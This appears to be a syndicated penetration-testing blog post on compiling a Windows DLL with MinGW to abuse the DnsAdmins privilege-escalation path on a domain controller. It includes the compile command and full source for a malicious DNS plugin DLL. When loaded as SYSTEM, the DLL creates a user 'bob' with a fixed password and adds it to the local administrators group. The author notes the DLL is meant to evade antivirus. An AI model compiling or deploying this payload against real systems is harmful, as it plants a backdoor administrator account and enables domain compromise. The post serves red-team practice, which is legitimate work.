Compiling a DLL using MingGW
Compiling a Windows DLL has always been a pain for me. Getting Visual Studio working is frustrating (or at least used to be, before VS2019). I ran into this same issue recently. I didn’t have Visual Studio readily available because the VMs I had built for the task were left behind. I always knew that MinGW could build DLLs; however, I never spent the time to figure it out.
Now was that time. I needed a DLL that wouldn’t be caught by AV, and I could use it to exploit the DNS Admin escalation path. You can read all about the DNS Admin escalation path in the resources below, but the TL;DR boils down to if you happen to be in the local group called “DnsAdmins” on a Domain Controller, then you have permission to load a DLL into the DNS service running as SYSTEM.
(DnsAdmins is a LOCAL group, which through me off for a long time about this attack. Trying to find it at the domain level was super annoying. On my test DC, I could see it, but when I was doing engagements, I never seemed to find it.)
Resources
DNS Admin Resources:
- https://github.com/kazkansouh/DNSAdmin-DLL
- https://github.com/dim0x69/dns-exe-persistance
- https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/from-dnsadmins-to-system-to-domain-compromise
- https://adsecurity.org/?p=4064
- https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83
Compiling DLLs with MinGW:
- https://blog.didierstevens.com/2019/10/28/quickpost-compiling-service-dlls-with-mingw-on-kali/
- https://blog.didierstevens.com/2018/07/10/quickpost-compiling-dlls-with-mingw-on-kali/
Compiling
… here is the super exciting output from compiling the DLL…
root@kali:~/dnsadmin# x86_64-w64-mingw32-gcc -shared -o evil.dll evildll.cpproot@kali:~/dnsadmin#
Example Code
#include <windows.h>#include <stdlib.h>// Here so I remember how to compile it.// x86_64-w64-mingw32-gcc -shared -o evil.dll evildll.cppextern "C" __declspec(dllexport) int DnsPluginInitialize(PVOID a1, PVOID a2){ system("net.exe user bob Password123 /add"); system("net.exe localgroup administrators bob /add"); return 0;}extern "C" __declspec(dllexport) int DnsPluginCleanup(){ return 0;}extern "C" __declspec(dllexport) int DnsPluginQuery(PSTR a1, WORD a2, PSTR a3, PVOID a4){ return 0;}BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved){ switch (fdwReason) { case DLL_PROCESS_ATTACH: OutputDebugString("DLL_PROCESS_ATTACH"); break; case DLL_THREAD_ATTACH: OutputDebugString("DLL_THREAD_ATTACH"); break; case DLL_THREAD_DETACH: OutputDebugString("DLL_THREAD_DETACH"); break; case DLL_PROCESS_DETACH: OutputDebugString("DLL_PROCESS_DETACH"); break; } return TRUE;}
*** This is a Security Bloggers Network syndicated blog from Posts on malicious.link authored by Posts on malicious.link. Read the original post at: http://feedproxy.google.com/~r/Room362com/~3/tgOLJ-s6cI0/